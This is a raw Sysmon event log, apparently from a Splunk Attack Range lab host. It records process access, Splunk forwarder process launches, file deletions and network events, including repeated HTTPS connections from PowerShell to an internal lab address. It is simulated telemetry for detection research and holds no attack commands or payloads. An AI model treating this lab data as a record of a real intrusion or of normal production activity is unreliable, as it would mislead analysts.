21:54:41.984{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127613Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:41.984{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127612Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:41.984{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-82A1-613A-B596-03000000C801}6688C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035127611Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:41.984{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-82A1-613A-B596-03000000C801}6688C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035127610Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:41.969{B81B27B7-82A1-613A-B596-03000000C801}6688C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000035127609Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:06.349{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62050-false10.0.1.12-8000- 23542300x800000000000000035127608Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:41.737{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FE57959F60D358B2989A45EFF647CD60,SHA256=BCBAAC3B40F4FC4BE8E534934F5C551DED929F3A115103DC2A82AFBDF957BF54,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127607Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:41.737{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=46FEE6ACE25B2B5E178EC0CC168D4EB6,SHA256=1D9BF44FEC0C5636336B7F35F4018F5571F64091F172F329B27FBFBFF7C30689,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035127606Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:41.554{B81B27B7-82A1-613A-B496-03000000C801}62484656C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127605Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:41.384{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-82A1-613A-B496-03000000C801}6248C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127604Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:41.384{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127603Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:41.384{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127602Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:41.384{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127601Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:41.384{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127600Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:41.384{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-82A1-613A-B496-03000000C801}6248C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035127599Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:41.384{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-82A1-613A-B496-03000000C801}6248C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035127598Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:41.370{B81B27B7-82A1-613A-B496-03000000C801}6248C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035127597Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:41.336{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3E68153FF12CD5F0D2D2C054A2952F7E,SHA256=D0422B7775C5BCDD10F505795AA3E10435C2F410EA192E221ACFA3BBF5D91E76,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127619Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:42.984{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FE57959F60D358B2989A45EFF647CD60,SHA256=BCBAAC3B40F4FC4BE8E534934F5C551DED929F3A115103DC2A82AFBDF957BF54,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127618Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:42.383{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=91B7471D211848B2818EEA46909A9D36,SHA256=550AA1A16999F558C80E3A073935EC5FFA65AE285354926C1EF38392B1903989,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035127622Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:08.163{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62051-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035127621Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:43.433{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=484D2E5A649D341259FFF09B146D97EF,SHA256=00A8B224CF5ABC77EE50AB4615B110357CCBC361187ED11DB52FA8FE97A05178,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127620Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:43.098{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=1A89FBDD3511D854EAC6357CDDF67911,SHA256=6493E3456F9DA6BBAB6EF7B46A4D613F2AA4BF6234BC079C35F7ABFDB8A6044B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127623Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:44.481{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3C1805B1693EFF6B03C016DC76DD4FB1,SHA256=DDAAC0EA5CF216E14CD83B4D01B6E618CCC677E77F580321245E3AA1DEB2FFDF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127624Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:45.496{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AE1655F1B0272D028F22153A765CF280,SHA256=976C2C9F1CDDF0F17A18C59C0C35B37B6DD3806973E0A51A14ACB6B5FF5CF7F1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127625Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:46.528{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4DC40C4AB42957F4E0D21CF49F107E4B,SHA256=FF20BB5F6CA6C4E72B47F674FEAED2E4D731F0F228508B2B4E23F8884BB73984,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127626Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:47.562{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=22A29B072577F706EB457AD8DB620018,SHA256=7C61DBC63AC1311BDE39078C30ED16B9254C35FD98DECA607C901BB0F35FB91C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127629Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:48.577{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=453F97EFF1424AB98B6BCABF323094FD,SHA256=2A118EE21A4512DDF4B8E5BEE304EB4810B02E72F97A3440A5E954284342745C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127628Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:48.528{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=D4984A539DDFC809DF9BD9CF31A78462,SHA256=A7A7426A5D73BDD267C2E42C305C5CB7E1DC8B21D92599C3192E9BEE9209F35A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035127627Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:12.242{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62052-false10.0.1.12-8000- 23542300x800000000000000035127630Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:49.591{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E40D3C2B1B181A0621560CEA084D3EEB,SHA256=B565D0E3C0F87DC320E7255D26EFF90CD2A3F8D91DA3F5043FE4301B3C977FBC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127632Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:50.594{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=829AFAEA8FEB18CD28437DEA2C29037E,SHA256=D3D6782CF9525D65897178A96F6E65746599B01DCE014026EC495D99E8878DEA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035127631Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:14.188{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62053-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035127633Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:51.609{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B897BE86951C97A3395360EFFF23B305,SHA256=F70B699B0A9AF26C4BCE9EAD14581462A3A5BF646D3BBE2125B50E2F5A5E0D22,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127634Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:52.625{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9BB0D8A2E590A1377D20F5A3036C7E56,SHA256=72817F5352CAC9909B1EA0DFBE404371BCC22F82DCD9FD663A8D918835498BF3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127636Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:53.644{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=932E48339A375A24CF203EB29261C8B7,SHA256=71DF3CA838BEA43EEFF46ADB14BE78DAB47D165C325F421565AEA03262C2FDB4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035127635Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:17.404{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62054-false10.0.1.12-8000- 23542300x800000000000000035127639Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:54.691{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B6BAEF774F26EE00B70227C6552C3F99,SHA256=0210E3EC741D99961633BF450BD570FAF4DEC5FE6CF97927DF31B9365644C3AD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035127638Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:19.203{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62055-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035127637Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:54.060{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=594AE5B3289F8BF94E833835DAF02B89,SHA256=033699BBF278B372238D75C443133425AF5A1E292F64961CE9410BCCCCD23BA9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127640Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:55.727{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=501F46DE390CF739634DD80B8770FBE8,SHA256=67C0FC633D15FE4AE196EFEB907C86399641AB170F9A5902CC8C7D0A49CCCD47,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 